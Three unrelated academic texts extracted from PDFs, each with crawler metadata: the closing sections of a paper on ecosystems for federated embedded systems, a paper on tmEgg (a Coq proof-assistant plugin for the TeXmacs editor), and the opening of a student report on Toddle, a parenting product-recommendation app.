support new and refined models after the EcoFES has been activated. This requires that the effects of a proposed change is analysed and communicated and, if necessary, negotiated among affected players before its introduction to the EcoFES. 3.3.3 Enforce Sustainability The third business challenge relates to ecosystem sustainability and includes the ecosystem’s processes and products. EcoFES services should provide the necessary business opportunities for external players to develop added value. However, EcoFES has inherent weaknesses in its fundamental principles that must be mitigated before it is activated. The openness promoted by EcoFES is not just a strength, but it is also a weakness. A player may for instance decide to leave the ecosystem federation, which affects an EcoFES at many levels. Achieving long-term sustainability requires an understanding of the challenges and risks involved upfront. Sharing assets and information while depending on others creates a degree of uncertainty that should be mitigated. This could influence business decisions, models and strategies of the players collaborating with respect to market and technology shifts. This situation is similar to a reuse strategy that involves external players. However, EcoFES principles such as the degree of openness and the tight coupling between systems in the targeted product domains amplify the complexity. 4. RELATED WORK The term "ecosystem" was introduced by Iansiti and Levien that described the notion of business ecosystems through the examples of Wal-Mart and Microsoft [6]. In their article the authors explained the benefits of adopting the "ecosystem-thinking" from a business perspective and discussed various strategies organisations may utilise, based on their role in the ecosystem. The term "software ecosystem" was introduced by Messerschmidt and Szyperski [9] but was extended by Bosch [2]. In particular, Bosch extended the classical "product-line-thinking" of software products. Bosch identified two reasons for the trend towards open platforms: firstly, it is too expensive for a manufacturer to develop alone all the functionality that customers would wish for, and secondly gathering the requirements for customisation could potentially be done more efficiently through an open platform. He also classified ecosystems according to two dimensions: the type of platform used (desktop, web or mobile) and also the level at which the ecosystem is created (on an operating system, application software, or own user-developed code). Hansson and Dybå [5] described in their work a systematic overview of software ecosystems and explained several related challenges, which overlap to a high degree with those reported by Cheshbrough [4] as challenges of open innovation in open business models. Jansen, et al. [7] presented a research agenda for software ecosystems, discussed about the main challenges involved in a technical and business level through three dimensions: a) from a software ecosystem level, b) software supply network level, and c) from the software vendor level, and also mentioned issues of formal modelling, transparency, guidelines, standards, and actions, that are of central importance. Research on ecosystems for ES is considered highly significant to our work, but looking into the related literature, very limited publications exist. Also, to the best of the authors’ knowledge, the concept of “open innovation” in ES, and when Federations are formed, is hardly mentioned and therefore research in that sense lacks a broad and well-established knowledge base on the combination of the topics. 5. CONCLUSIONS AND FUTURE WORK This paper described the concept, motivation, benefits and challenges for developing System of Systems (SoS) based on the notion of Federated Embedded Systems (FES). In particular, the focus has been on forming an ecosystem to wrap the players, processes, strategies and products. Our work provides foundations for our future work and the research we are currently conducting. Aim of our research is to cover the following topics: (1) How would an innovative open SoS based on FES be described and modelled? (2) How could the SoS be controlled? (3) How would the virtual players and development teams be better organised? (4) What are the relationships between the different actors? (5) How would quality be ensured? (6) How should technology be structured? (7) How are intellectual property rights handled?, and finally, (8) what are the potential business models that should be established to support the process? The overarching aim of the research is a formal conceptualisation of the SoS for EcoFES which can be used for prototyping, deployment and commercialisation. Our on-going research activities involve combining knowledge of technology solutions and software engineering with expertise in processes and models to create a deeper understanding of how to best design the ecosystems for open innovation where products will contain FES. Other activities include carrying out a systematic mapping and a systematic literature review to provide a high-level view on the related literature and clarify the major streams of research, application domains, industrial parties, and implications on business models, development methods and product architectures. 6. ACKNOWLEDGMENTS This research was funded by VINNOVA, the Swedish Agency for Innovation Systems (grant no. 2012-03782). 7. REFERENCES
{"Source-Url": "http://www.es.mdh.se/pdf_publications/3266.pdf", "len_cl100k_base": 4196, "olmocr-version": "0.1.50", "pdf-total-pages": 4, "total-fallback-pages": 0, "total-input-tokens": 17715, "total-output-tokens": 4941, "length": "2e12", "weborganizer": {"__label__adult": 0.0003819465637207031, "__label__art_design": 0.0004172325134277344, "__label__crime_law": 0.0003962516784667969, "__label__education_jobs": 0.0004880428314208984, "__label__entertainment": 6.407499313354492e-05, "__label__fashion_beauty": 0.0001556873321533203, "__label__finance_business": 0.0005688667297363281, "__label__food_dining": 0.0003139972686767578, "__label__games": 0.0005865097045898438, "__label__hardware": 0.0020751953125, "__label__health": 0.0004794597625732422, "__label__history": 0.00025177001953125, "__label__home_hobbies": 7.104873657226562e-05, "__label__industrial": 0.0005254745483398438, "__label__literature": 0.0002130270004272461, "__label__politics": 0.000316619873046875, "__label__religion": 0.00043272972106933594, "__label__science_tech": 0.03424072265625, "__label__social_life": 6.079673767089844e-05, "__label__software": 0.005397796630859375, "__label__software_dev": 0.951171875, "__label__sports_fitness": 0.00026488304138183594, "__label__transportation": 0.0007448196411132812, "__label__travel": 0.0001951456069946289}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 24783, 0.03122]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 24783, 0.29333]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 24783, 0.93255]], "google_gemma-3-12b-it_contains_pii": [[0, 5373, false], [5373, 10975, null], [10975, 18151, null], [18151, 24783, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5373, true], [5373, 10975, null], [10975, 18151, null], [18151, 24783, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 24783, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 24783, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 24783, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 24783, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 24783, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 24783, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 24783, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 24783, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 24783, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 24783, null]], "pdf_page_numbers": [[0, 5373, 1], [5373, 10975, 2], [10975, 18151, 3], [18151, 24783, 4]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 24783, 0.0]]}
olmocr_science_pdfs
2024-12-02
2024-12-02
de91c7c7b5e13f35972abbfc8a11624cab1628b1
A Document-Oriented Coq Plugin for \TeXMACS Herman Geuvers Lionel Elie Mamane 10\textsuperscript{th} August 2006 Abstract This article discusses the integration of the authoring of a mathematical document with the formalisation of the mathematics contained in that document. To achieve this we have started the development of a Coq plugin for the \TeXMACS scientific editor, called tmEgg. \TeXMACS allows the wysiwyg editing of mathematical documents, much in the style of L\LaTeX. Our plugin allows to integrate into a \TeXMACS document mathematics formalised in the Coq proof assistant: formal definitions, lemmas and proofs. The plugin is still under development. Its main current hallmark is a document-consistent interaction model, instead of the calculator-like approach usual for \TeXMACS plugins. This means that the Coq code in the \TeXMACS document is interpreted as one (consistent) Coq file: executing a Coq command in the document means to execute it in the context (state) of all the Coq commands before it. 1 Introduction \TeXMACS ([vdH04]) is a tool for editing mathematical documents in a wysiwyg style. The input an author types is close to L\LaTeX, but the output is rendered directly on screen in a pretty-printed way. \TeXMACS supports structured editing and it stores the files in a structured way using tags, which is close to XML. So, a \TeXMACS document is a labelled tree. The labels (tags) provide information that can be used as content or display information. For a specific label, the user can choose a specific way of rendering the subtrees under a node with that label, for example rendering all subtrees in math mode. But a user may also choose a specific action for the subtrees, for example sending the subtrees as commands to the computer algebra package Maple. Of course, many labels are predefined, like in L\LaTeX, so a user is not starting from scratch. \TeXMACS facilitates interaction with other applications in an easy way: within \TeXMACS one can open a “session”, for example a Maple session, and then input text within that session is sent to a Maple process that is running in the background. The Maple output is input to the \TeXMACS document in a structured way, and rendered accordingly. In this way, \TeXMACS can be used as an interface for Maple, with the additional possibility to add text or mathematical formulas around the Maple session, creating a partially interactive mathematical document. Here the interaction lies in the possibility to execute parts of the document in the background application. In this paper we present tmEgg, a Coq plugin for TeXmacs. The plugin allows the user to call Coq from within a TeXmacs document, yielding a TeXmacs document interleaved with Coq sessions. It also provides special commands for Coq, like stating a definition or a lemma. The plugin does not provide its own proof language, but leverages any proof language that Coq understands or will understand in the future, such as [Cor06]. This means that when doing a proof, the user types actual Coq commands (usually tactics) in the TeXmacs document, which are then sent to Coq as-is and the Coq output is rendered by TeXmacs. This is in contrast with the approach of e.g. [The03], [DF05] or [ALW06], that seek to change the way a proof is written or the way a user interface interacts with the prover (relegated to a “backend” role) in a much more fundamental way. A crucial aspect of the plugin is that it views the sequence of Coq sessions within a document as one Coq file. So, when one opens a document and executes a command within a Coq session, first all previous Coq commands (possibly in previous Coq sessions) are executed and the present command is then executed in the Coq state thus obtained. So the TeXmacs document as a whole also constitutes a valid Coq development. Additionally, one can backtrack to a command within a previous session, jumping to the Coq state at that point of the development. From the Coq perspective, one can thus see the TeXmacs document as a documentation of the underlying Coq file. Using TeXmacs, one adds pretty printed versions of the definitions and lemmas. The plugin further supports this by a folding (hiding) mechanism: a lemma statement has a folded version, showing only the pretty printed (standard mathematical) statement of the lemma, and an unfolded version, showing also the Coq statement of the lemma. A further unfolding also shows the Coq proof of the lemma. Altogether there are four ways of seeing the tmEgg TeXmacs plugin. These are not disjoint or orthogonal, but it is good to distinguish them and to consider the various requirements that they impose upon our plugin. A Coq interface. One can call Coq from within TeXmacs, thus providing an interface to Coq. When the user presses the return key in a Coq interaction field, the Coq commands in this field are sent to Coq and Coq returns the result to TeXmacs. The plugin doesn’t do any pretty printing of Coq output (yet), but it allows to save a Coq development as a TeXmacs file which can be replayed. Purely as an interface the plugin does about the same as Proof General ([Asp00]) or CoqIde ([Teab]). A documented Coq formalisation. A Coq formalisation usually has explanatory comments to give intuitions of the definitions, lemmas and proofs or to give a mathematical (e.g. in \LaTeX) explanation of the formal Coq code. The plugin can be used for doing just that: the traditional TeXmacs elements are used for commenting the underlying Coq file. In this respect, tmEgg can play the same role as Coqdoc ([Teab]), but also more. Coqdoc extracts document snippets (in HTML or \LaTeX format) from specially formatted comments in Coq scripts (.v files), and creates a HTML or \LaTeX document containing these snippets and the vernacular statements (or only gallina, that is the statements without proofs) verbatim, along with some basic pretty-printing of terms. Where the use of Coqdoc restricts the user to choosing between having the explanatory comments rendered (as a HTML or \LaTeX document) and interacting with Coq (in the “source” .v file), tmEgg enables the user to have both at the same time, while keeping the property that the document can be read without Coq, and exported to a format that can be read without \TeXMacs (but without Coq interaction), such as HTML, PostScript, PDF, . . . Taking this use case to its extreme, one arrives at a notion of literate proving, by analogy to literate programming. **A mathematical document with a Coq formalisation underneath.** One can write a mathematical article in \TeXMacs, like one does in L\TeX. Thus, one can take a mathematical article and extend it with formal statements and proofs. Due to the folding mechanism, the “view” of the article where everything is folded can be the original article one started with. It should be noted that, if one adds a Coq formalisation underneath this, not everything needs to be formalised: lemmas can be left unproven etc., as long as the Coq file is consistent, i.e. no notions are used unless they are defined. In this sense, tmEgg makes a step in the direction of the Formal Proof Sketches idea of [Wie04]. **Mathematical course notes with formal definitions and proofs.** We can use the \TeXMacs document for course notes (handouts made by the teacher for students). An added value of our plugin is that we have formal definitions and proofs underneath, but we don’t expect that to be a very appealing feature for students. On the other hand, we also have full access to Coq, so we can have exercises that are to be done with Coq, like “prove this statement” or “define this concept such that such and such property holds”. This is comparable in its intent to ActiveMath ([MAB+01]). In the following we present our plugin tmEgg, including some technical details and a fragment of a \TeXMacs document with underlying Coq formalisation. We will discuss the four views on the plugin as mentioned above in detail. An essential difference between the tmEgg Coq plugin that we have created and other \TeXMacs plugins, e.g. the one for Maple, is that we take a document oriented approach. This we will describe first. ## 2 The document-consistent model The \TeXMacs plugins to computer algebra or proof systems usually obey a temporal model of interaction, that is that the expressions given to the plugin are evaluated in chronological order, irrespective of their relative position in the document. In other words, the \TeXMacs plugin system ignores the fact that the interpreter it is interfacing with has an internal state which is modified by the commands \TeXMacs gives it and influences the results of these commands. This can lead to the document showing results that are not consistent with the natural reading order of the document, if the expressions are not evaluated in the order in which they appear, something which crops up naturally when writing a document: One sometimes goes back to improve on a previous statement or definition. Furthermore, the results shown by the document may be irreproducible, as the sequence of statements leading up to the state in which the expressions were evaluated can be lost. See figure 1 for an example: The left part shows an example of inconsistent output with the CAS Axiom. The third (in reading order) command was executed before the second but after the first, leading to the evaluation of a resulting in 6, while reading the document from top to bottom would suggest it should be 5 at this point. The situation would be even worse if \( a := 6 \) were to be deleted; the reason for \( a \) evaluating to 6 is completely lost. Contrast with the right part, showing a tmEgg Coq session. \texttt{Empty\_set} is predefined in Coq’s standard library, and gets redefined in the second command. However, whatever the order in which the user asks for evaluation of the commands, the result shown will always be the one in the figure. E.g. if the user asks for evaluation of the second command (defining \texttt{Empty\_set} to be 5) and then asks for the evaluation of the first one, the first command will always answer “\texttt{Empty\_set} is an inductively defined type of sort Set without any constructor”, not “\texttt{Empty\_set} is 5”. ![Figure 1: Example of inconsistent and consistent output](image) This risk of inconsistency is naturally highly undesirable in the context of writing formal mathematics, leading to a \textit{document-consistent} model of interaction: a statement is always evaluated in the context defined by evaluating all statements before it in the document, in document order, starting from a blank state. ### 2.1 Implementation Coq 8.1 thankfully provides basic framework support for this, in the form of a backtrack command that can restore the state to a past point \( B \). It works under the condition that no structure (section, definition, lemma, ...) whose definition is currently finished was open (incomplete) at point \( B \). If this condition is not satisfied, tmEgg backtracks up to a point before \( B \) where this condition does hold and then replays the statements between that point and \( B \). The arguments given to the backtrack command are derived from state information that Coq gives after completion of each command, in the prompt. tmEgg stores the information on the Coq state \textit{before} a command as a \texttt{state marker} next to the command itself, that is a document subtree whose rendering is the empty string. This state information consists (roughly speaking) of the number of definitions made in the current session, the list of open definitions and the number of steps made in the current open definition, if any. tmEgg also keeps track of the position in the document of the last command executed by Coq. This is used at Coq command execution time to determine whether a backtrack or a forward jump is necessary before the command can be evaluated. 3 Presentation of tmEgg tmEgg extends \( \text{T}_{\text{EXMACS}} \) with Coq interaction fields. One can naturally freely interleave Coq interaction fields with usual document constructs, permitting one to interleave the formal mathematics in Coq and their presentation in \( \beta\text{T}_{\text{EX}} \) level mathematics. Each Coq interaction can be folded away at the press of a button, as well as each specific result of a command individually. The output of the previous command is automatically folded upon evaluation of a command. See figure 2 for an example: The empty circles indicate a folded part and can be clicked to unfold that part, and the full circles indicate a foldable unfolded part and can be clicked to fold it. Here, the formal counterpart to hypothesis 2 is completely folded, while the statement of lemma 3 is unfolded and its proof folded. The proof of lemma 4 is unfolded, but the result of most of its steps is folded. 1 Nested Intervals We first give some general constructions and lemmas for nested intervals that will be used in the proof of the Intermediate Value Theorem later. - Variable \( a, b : \mathbb{R} \) \[ a \text{ is increasing, i.e. } \forall i \in \mathbb{N} : a_i \leq a_{i+1} ; \] \[ b \text{ is decreasing i.e. } \forall i \in \mathbb{N} : b_i \geq b_{i+1} ; \] \[ a \text{ is below } b, \text{i.e. } \forall i \in \mathbb{N} : a_i < b_i ; \] \[ a \text{ and } b \text{ get arbitrarily close, i.e. for every positive real number } \epsilon, \text{ there is an } i \text{ such that } b_i < a_i + \epsilon \] - Lemma 3. \( a \) is monotone, i.e. \( \forall i,j \in \mathbb{N} : i \leq j \rightarrow a_i \leq a_j \) \[ \text{Coq } \text{Lemma } a_{\text{mon}}' \text{ : forall } i,j : \mathbb{N}, i < j \rightarrow a_i \leq a_j. \] - Lemma 4. \( b \) is monotone, i.e. \( \forall i,j \in \mathbb{N} : i \leq j \rightarrow b_i \leq b_j \) \[ \text{Coq } \text{Lemma } b_{\text{mon}}' \text{ : forall } i,j : \mathbb{N}, i < j \rightarrow b_i \leq b_j. \] - \( b_{\text{mon}}' < \text{intro}. \) - \( b_{\text{mon}}' < \text{set } (b' := \text{fun } i : \mathbb{N} \rightarrow [-] (b (i)) \text{ in } *). \] - \( \text{1 subgoal } \) \[ a : \mathbb{N} \rightarrow \mathbb{R} \] \[ b : \mathbb{N} \rightarrow \mathbb{R} \] \[ a_{\text{mon}} : \text{forall } i : \mathbb{N}, a_i \leq a_{i+1} \] \[ b_{\text{mon}} : \text{forall } i : \mathbb{N}, b_i \geq b_{i+1} \] \[ a_{\text{b}} : \text{forall } i : \mathbb{N}, a_i \leq b_i \] \[ b_{\text{a}} : \text{forall } \varepsilon : \mathbb{R}, \text{Zero} \varepsilon \rightarrow (i : \mathbb{N} \rightarrow [\leq] (\varepsilon) \rightarrow \text{nat}) \] \[ i : \text{nat} \] \[ j : \text{nat} \] \[ h : i < j \] \[ b' := \text{fun } i : \mathbb{N} \rightarrow [-] (b (i)) : \mathbb{N} \rightarrow \mathbb{R} \] \[ \text{-----------------------------} \] \[ b j[=] b \] \[ b_{\text{mon}}' < \text{step} ([-][-] (b j)). \text{ step} ([-][-] (b (i))). \] Figure 2: tmEgg screenshot Note that the result of each Coq command is inserted into the document stat- ically (and replaced upon reevaluation); this means that they can be copied and pasted like any part of the document, but also that the saved file contains them, so that the development can be followed without running Coq, a potentially lengthy operation. As a corollary, the development can even be followed (but not independently checked) on a computer lacking Coq. In order to help the user create the proposed “formal and informal version of the same mathematics” structure (particularly in the “mathematical document with a Coq formalisation underneath” scenario), we present him with a menu where he can choose a Coq statement type (such as Lemma, Hypothesis, Definition, ...) and that will create an empty template to fill made of: - the corresponding \texttt{\LaTeX} theorem-like environment for the informal statement; - a foldable Coq interaction field for the formal statement; - a foldable Coq interaction field for the body of the informal statement, if appropriate; This is illustrated in figure 3. ![Figure 3: New statement menu, empty lemma structure](image) 3.1 Architecture We have decided to try to minimise the changes to Coq itself for this project, and in particular to try not to put \texttt{\LaTeX} protocol or syntax specific code in Coq. That’s why, rather than adapt Coq to speak the \texttt{\LaTeX} plugin protocol by itself, we have implemented a wrapper in OCaml that translates from Coq to \texttt{\LaTeX} (see figure 4). We try to keep that wrapper as simple and stateless as possible, putting most of the intelligence of the plugin in Scheme in \texttt{\LaTeX}. 4 How well does the plugin do? In the introduction, we have described four views (possible applications) on the tmEgg plugin. We now want to discuss to which extent the plugin satisfies the requirements for each of those views. A Coq interface. One can do Coq from within a \texttt{TEXMACS} document using our plugin, but, compared to well-known interfaces like Proof General ([Asp00]) and CoqIDE ([Teab]), the plugin is in particular worse in terms of the display of the proof state: the proof state is displayed \textit{inside} the document, which can clutter things up. From a purely user-interface-for-theorem-provers perspective, a reserved fixed-size area for displaying the proof state is sometimes better, in particular to contain the proof state when it grows unwieldy large. Other things that our plugin does not support but are possible to add in \texttt{TEXMACS} are: menus for special tactics and pretty printing (but Proof General and CoqIDE don’t have this either). Pretty printing is of course interesting to add in the context of \texttt{TEXMACS}, because it has various \LaTeX{}-like facilities to add it. However, it should be noted that, if we want to use our plugin as an interface for Coq, the syntax should be accepted as \textit{input} syntax, too, so as to not confuse the user. The user may also (occasionally or structurally) prefer to use the default Coq pure text syntax rather than mathematical graphical notations; this will always be supported. A documented Coq formalisation. As a documentation tool, the plugin works fine. One can easily add high level mathematical explanations. It would be convenient to be able to load a whole (annotated, e.g. in Coqdoc syntax) Coq file into \texttt{TEXMACS} and then continue further annotating it; we intend to write such an import tool in the future. Note however that there is no (formal) link between the formal Coq and the high level explanation in \texttt{TEXMACS}, because the high level translation is not a translation of the Coq code, but added by a human. This is different from, e.g. the work in the Mowgli ([AW02]) project, where we have a high level rendering of the formal Coq statements. A mathematical document with a Coq formalisation underneath. This is a way the plugin can be used now. One would probably want to hide even more details, so more folding would be desirable, e.g. folding a whole series of lemmas into one “main lemma” which is the conclusion of that series. Thus one would be able to create a more high level of abstraction that is usual in mathematical documents. Of course this can already be done in \texttt{TEXMACS}, but our plugin does not specifically propose it automatically. If such nested folding would be added, it would also be advisable to be able to display the “folding structure” separately, to give the high level structure of the document. Mathematical course notes with formal definitions and proofs. In general, proof assistants are tools that require quite some maturity to be used, so therefore we don’t expect students to easily make an exercise in their \texttt{TEXMACS} course notes using the underlying proof assistant Coq, i.e. as an exercise in the mathematics studied rather than as an exercise in Coq. This situation may improve in the future though, depending on the maturity of proof as­ istant technology. It should also be noted that the plugin does not (yet) explain/render the Coq formalised proofs, like e.g. the Helm tool ([APC+03]) does (by translating a formal proof into a mathematically readable proof). See also [AGL+06]. 5 Future Outlooks 5.1 Mathematical input/output Current \TeXmacs interfaces to computer algebra systems include conversion to and from mathematical notations (see figure 5). Doing the same with Coq brings some \[ \begin{array}{|c|} \hline 5^2 + 18 \\ 43 \\ \text{Type: PositiveInteger} \\ \hline \end{array} \] \[ \begin{array}{|c|} \hline \text{\textit{integrate}(x^2,x)} \\ \frac{1}{3}x^3 \\ \text{Type: Polynomial Fraction Integer} \\ \hline \end{array} \] Figure 5: Mathematical notation input/output with Axiom difficulties in a more acute way than with a CAS: - Different developments will call for the same notation to map to different Coq objects; there are for example several different real numbers implementations for Coq. - Similarly, the best notation to use for the same Coq construct will vary de­ pending on the document, where in the document one is, or even more subtle factors. A prime example of this is parentheses around associative operators: One usually doesn’t want a full parenthesising in statements, but if one al­ ways leaves out “unnecessary” parentheses, the statement of the associativity lemma itself looks quite pointless, as do the proof steps consisting of applying the associativity lemma. - Some Coq constructs (such as some ways to define division) need information that is not part of usual mathematical notation (such as proof that the divisor is not zero). The notations will thus probably have to be highly dynamic; if making good choices automatically proves impossible, maybe a good compromise will be to let the author of the document choose on a case-by-case basis. Once at least the conversion to mathematical notation is satisfying, we can make a $\text{T}_{\text{E}X}\text{MACS}$ command that takes a Coq term (or the name of one) and whose rendering is the “nice” mathematical rendering for that term. This means that users will be able to put Coq terms in their documents and have them look like $\text{L}_{\text{E}}\text{X}$-level mathematics. This conversion from and to “normal” mathematical notation might also form a usable mechanism for informal and unsafe exchange of terms between different computer algebra systems and proof assistants. E.g. if the Coq goal to prove is $x^{18} - 5x^7 + 5 = 0 \rightarrow x > 2$, the user could select in the goal the expression $x^{18} - 5x^7 + 5 = 0$ (duly converted from Coq term to mathematical notation by $\text{tmEgg}$), paste it into a CAS session and ask the CAS to solve that equation (where the $\text{T}_{\text{E}X}\text{MACS}$-CAS integration plugin will duly convert it to the syntax of the CAS being used) to quickly check whether the goal is provable, or use the CAS as an oracle to find the roots and use knowledge of the roots to make the proof easier to write. 5.2 Communication with Coq The wrapper currently interacts with Coq through the coqtop -emacs protocol, that is the human-oriented coqtop protocol\footnote{A tutorial to Coq is available at \url{http://coq.inria.fr/doc/tutorial.html}.}, very slightly extended to be more convenient for programs. However, this protocol presents a few suboptimalities for our purposes: - There is no documented, robust, way to determine whether a command you gave failed, gave a warning or succeeded. (Naturally, the existing interfaces have organically grown rules about parsing Coq’s answer that will give usually succeed in this task.) - Terms are pretty-printed back to the original input syntax, which is non trivial to parse and interpret; it has some overloading and in particular relies on typing information. In order to implement the “mathematical notation input/output” with $\text{T}_{\text{E}X}\text{MACS}$, we would like to get the terms at a more low level, as trees. We thus plan to implement a good generic interface protocol for Coq, that will hopefully be able to serve the needs of several interfaces at once. We intend to revive and extend the protocol used by Centaur and PCoq ([Tea]). Its main advantage is that it presents terms as trees, in an easily parsed reverse polish notation with explicit arity. Other interfaces (as well as $\text{tmEgg}$) will (sometimes or always) want to get the usual text pretty-printed format, so this terms-as-trees feature will be made optional. However, this protocol in its current state does not integrate the rather new backtracking feature; we will extend it so that it does. 5.3 Miscellaneous Once the basic framework of $\text{tmEgg}$ has matured and works well, all kinds of small, but highly useful, features can be imagined: - Import of Coq files containing Coqdoc document snippets, leveraging the $\text{L}_{\text{E}}\text{X}$ import of $\text{T}_{\text{E}X}\text{MACS}$. \[\] • Automatic generation of table of Coq constructs in the document and corresponding index. • Similarly, menu command to jump to the definition of a particular Coq object. • Make any place where a Coq object (e.g. a lemma) is used a hyperlink to its definition. This could even eventually be expanded up to making tmEgg a Coq library browser. References
{"Source-Url": "http://repository.ubn.ru.nl/bitstream/handle/2066/36211/36211.pdf?sequence=1", "len_cl100k_base": 6181, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 25451, "total-output-tokens": 7748, "length": "2e12", "weborganizer": {"__label__adult": 0.0003399848937988281, "__label__art_design": 0.0011568069458007812, "__label__crime_law": 0.0004010200500488281, "__label__education_jobs": 0.007152557373046875, "__label__entertainment": 0.00021719932556152344, "__label__fashion_beauty": 0.00022411346435546875, "__label__finance_business": 0.0004451274871826172, "__label__food_dining": 0.0005125999450683594, "__label__games": 0.000965118408203125, "__label__hardware": 0.0011739730834960938, "__label__health": 0.0007572174072265625, "__label__history": 0.00046181678771972656, "__label__home_hobbies": 0.00022470951080322263, "__label__industrial": 0.0010395050048828125, "__label__literature": 0.000865936279296875, "__label__politics": 0.000362396240234375, "__label__religion": 0.0007791519165039062, "__label__science_tech": 0.404296875, "__label__social_life": 0.000247955322265625, "__label__software": 0.04345703125, "__label__software_dev": 0.53369140625, "__label__sports_fitness": 0.0004029273986816406, "__label__transportation": 0.0005469322204589844, "__label__travel": 0.0002267360687255859}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 28481, 0.02083]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 28481, 0.42589]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 28481, 0.86981]], "google_gemma-3-12b-it_contains_pii": [[0, 0, null], [0, 2573, false], [2573, 6158, null], [6158, 9459, null], [9459, 11879, null], [11879, 15068, null], [15068, 16669, null], [16669, 19777, null], [19777, 21889, null], [21889, 24990, null], [24990, 27627, null], [27627, 28481, null]], "google_gemma-3-12b-it_is_public_document": [[0, 0, null], [0, 2573, true], [2573, 6158, null], [6158, 9459, null], [9459, 11879, null], [11879, 15068, null], [15068, 16669, null], [16669, 19777, null], [19777, 21889, null], [21889, 24990, null], [24990, 27627, null], [27627, 28481, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 28481, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 28481, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 28481, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 28481, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 28481, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 28481, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 28481, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 28481, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 28481, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 28481, null]], "pdf_page_numbers": [[0, 0, 1], [0, 2573, 2], [2573, 6158, 3], [6158, 9459, 4], [9459, 11879, 5], [11879, 15068, 6], [15068, 16669, 7], [16669, 19777, 8], [19777, 21889, 9], [21889, 24990, 10], [24990, 27627, 11], [27627, 28481, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 28481, 0.0]]}
olmocr_science_pdfs
2024-12-08
2024-12-08
567f86b954ef7b303b1b40f11e4f2bb82fb3e04f
toddle Andrea Angquist, Naehee Kim, Vimal Kini Advisor: Robert Glushko OVERVIEW Toddle is an iOS app that allows parents to quickly and easily share recommendations or warnings about children’s products with their friends. Parents can take a photo of a kids product, let others know if its a product they love or hate, share comments on why, and post this information for their friends to see. Users can see what products their friends are posting, how they feel about them and for what ages they are appropriate. Parents can use Toddle to help their friends purchase the best products possible for their children, while avoiding products that aren’t worth purchasing, are unsafe, or of poor quality. As kids get older, Toddle makes it easy for parents, grandparents and their friends to see which products will meet kids changing needs. Toddle lets users ask each other for product advice, share their expertise, and give away or sell products that their kids no longer need. Our group felt that there was room in the marketplace for an information service that helped facilitate the sharing of product recommendations amongst friends. From previous projects and research, we knew that a personal recommendation from a friend is generally much more valuable to users than a recommendation, or several recommendations, from strangers. Additionally, being able to look up anonymous product reviews while in a store on a mobile device was something that we all thought helpful, but we didn’t know of an existing way to easily access or solicit product advice from friends while on the go. Right now, information services such as Yelp and Angie’s List provide reviews of services and local businesses for free or for a fee, but don’t provide reviews for products. Sites like Amazon and many other shopping sites often provide product reviews, but many of these sites aren’t integrated with social networking sites or email to allow you to see only reviews made by trusted people in your network. While these sites do provide reviews, they attempt to cover a broad range of business verticals, so the information they aggregate is likewise very broad; they generally don’t allow for very specific product categorization or filtering and rarely allow users to differentiate reviews based on whether or not a person owns a product, how long they’ve owned it, etc. Lastly, the product overview or recommendation areas of shopping websites are very rarely optimized for mobile devices. As a result, we agreed to design a mobile app that allows for an improved product recommendation experience amongst friends. MARKET Rather than design a service for all products and customer segments, we decided to narrow our focus to one specific niche market. Since newer parents are often very passionate about researching purchases and providing product recommendations and reviews, we thought this demographic might be a good fit for our project. From personal experience we hypothesized that mothers spend a lot of time and effort searching for and evaluating products for their children. We did not, however, want to limit ourselves to children’s products without first conducting user research to see if we could identify a more suitable market. In an initial round of user research, we interviewed ten people, six of which were parents. We were interested in finding product categories where users heavily researched or discussed products before making a purchasing decision, as our overall hypothesis was that our app would be used the most by people needing specific product advice or by people currently being asked for product advice. In our interviews, we found that the product categories most heavily researched and discussed by consumers were: - Autos - Electronics - Books and movies - Children’s products - Women’s clothing Moms were much more interested in soliciting and providing recommendations for kids’ products than they were for themselves and spent more time researching children’s products before purchasing and much more time discussing those products after purchase than they did on other product categories. As a result, we concluded that narrowing the scope of our service to baby and children’s products would allow us to tap into a very engaged and passionate customer base. Additionally, by focusing on one product group, we could provide users with a more customized design, look and feel, and a much more detailed product categorization scheme than sites like Amazon currently provide. COMPETITIVE ANALYSIS Similar products in our market can be broadly 